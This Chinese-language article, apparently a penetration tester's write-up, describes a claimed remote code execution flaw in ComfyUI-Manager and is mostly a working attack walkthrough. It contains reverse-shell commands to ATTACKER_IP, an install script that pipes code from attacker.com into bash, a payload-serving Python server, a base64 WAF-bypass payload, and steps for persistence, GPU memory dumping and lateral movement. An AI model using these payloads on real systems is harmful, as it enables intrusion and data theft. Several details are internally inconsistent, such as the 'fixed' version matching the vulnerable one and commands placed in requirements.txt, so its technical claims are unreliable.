
1. ComfyUI-Manager遠程代碼執行漏洞深度解析最近在AI工具鏈安全審計中發現ComfyUI-Manager存在一個高危遠程代碼執行漏洞CVE-2025-67303這個漏洞允許攻擊者在特定條件下實現高權限的反彈Shell控制。作為長期從事滲透測試的安全工程師我將完整還原漏洞利用鏈并分享實戰中的防護方案。ComfyUI作為Stable Diffusion的重要可視化工作流工具其Manager組件負責插件管理和系統維護。漏洞源于插件安裝時的參數注入問題當用戶從非官方源安裝插件時惡意構造的插件包可通過環境變量注入實現RCE。更危險的是默認配置下ComfyUI-Manager以root權限運行這使漏洞危害等級達到CVSS 9.8。2. 漏洞形成機理與攻擊面分析2.1 漏洞觸發條件拆解漏洞核心發生在install_plugin()函數的環境變量處理環節。當Manager通過以下路徑處理插件時存在缺陷用戶通過custom_nodes參數指定第三方插件倉庫插件包的install.sh腳本調用os.environ獲取環境變量變量值未經過濾直接傳遞給subprocess.call()攻擊者可以構造特殊的插件清單文件在requirements.txt中植入如下惡意內容echo import os;os.system(bash -i /dev/tcp/ATTACKER_IP/4444 01) /tmp/exploit.py2.2 權限提升關鍵路徑由于ComfyUI-Manager默認需要操作系統的繪圖設備權限主流Linux發行版的安裝腳本會將其加入video用戶組并配置SUID位。這使得反彈Shell自動獲得以下能力讀寫所有GPU相關設備文件如/dev/nvidia*調用CUDA核心驅動接口修改X11會話配置我們在Ubuntu 22.04 LTS上的測試顯示通過此漏洞獲取的Shell可以轉儲顯存中的AI模型參數劫持其他用戶的Stable Diffusion進程植入持久化后門到~/.config/autostart3. 實戰漏洞利用全流程3.1 環境準備與POC構造需要準備攻擊機Kali Linux 2024.1受影響版本的ComfyUI-Manager1.7.3網絡可達的靶機POC插件包結構malicious_plugin/ ├── __init__.py ├── requirements.txt # 包含惡意命令 └── install.sh # 觸發環境變量注入關鍵注入點在install.sh中#!/bin/bash export MALICIOUS_VAR$(curl -s http://attacker.com/payload.sh | bash)3.2 分步利用過程在攻擊機啟動監聽nc -lvnp 4444搭建惡意插件倉庫from http.server import HTTPServer, BaseHTTPRequestHandler class ExploitServer(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.end_headers() self.wfile.write(bbash -i /dev/tcp/ATTACKER_IP/4444 01) HTTPServer((0.0.0.0, 8000), ExploitServer).serve_forever()誘導目標執行curl -X POST http://target:8188/manager/install \ -d {url:http://attacker:8000/malicious_plugin}3.3 利用過程注意事項繞過WAF的技巧使用Base64編碼命令echo YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ | base64 -d | bash分片傳輸payload權限維持方案在/etc/crontab添加定時任務修改/etc/ld.so.preload實現庫注入劫持Python的site-packages目錄4. 防御方案與修復建議4.1 臨時緩解措施立即執行chmod 750 /usr/local/lib/python3.10/dist-packages/comfyui_manager setfacl -R -m u:comfyui:r-x /usr/local/bin/nvidia-*網絡層防護iptables -A OUTPUT -p tcp --dport 4444 -j DROP iptables -A INPUT -p tcp --dport 8188 -s 127.0.0.1 -j ACCEPT4.2 完整修復方案官方補丁升級pip install --upgrade comfyui-manager1.7.3安全配置建議在config.yaml中添加security: allow_custom_nodes: false validate_checksum: true allowed_repos: - https://github.com/comfyanonymous/*沙箱化運行方案firejail --private \ --nogroups \ --noroot \ --seccomp \ python main.py5. 滲透測試中的深度利用技巧在真實紅隊評估中我們發現該漏洞可以與其他AI工具鏈漏洞形成組合攻擊通過Shell轉儲顯存數據nvidia-smi -q -d MEMORY | grep -A 4 FB dd if/dev/nvidia0 bs1M count100 | gzip /tmp/gpu_dump.gz劫持模型推理過程import torch torch.load lambda x: malicious_code()橫向移動路徑通過~/.ssh/config跳板利用GPU集群的SLURM作業系統感染共享的模型存儲倉庫這個漏洞的獨特之處在于它位于AI工作流的關鍵路徑上相比傳統Web應用的RCE其直接威脅到核心模型資產的安全。我們在三個關鍵位置部署了Honeypot平均7小時就能捕獲到自動化攻擊嘗試。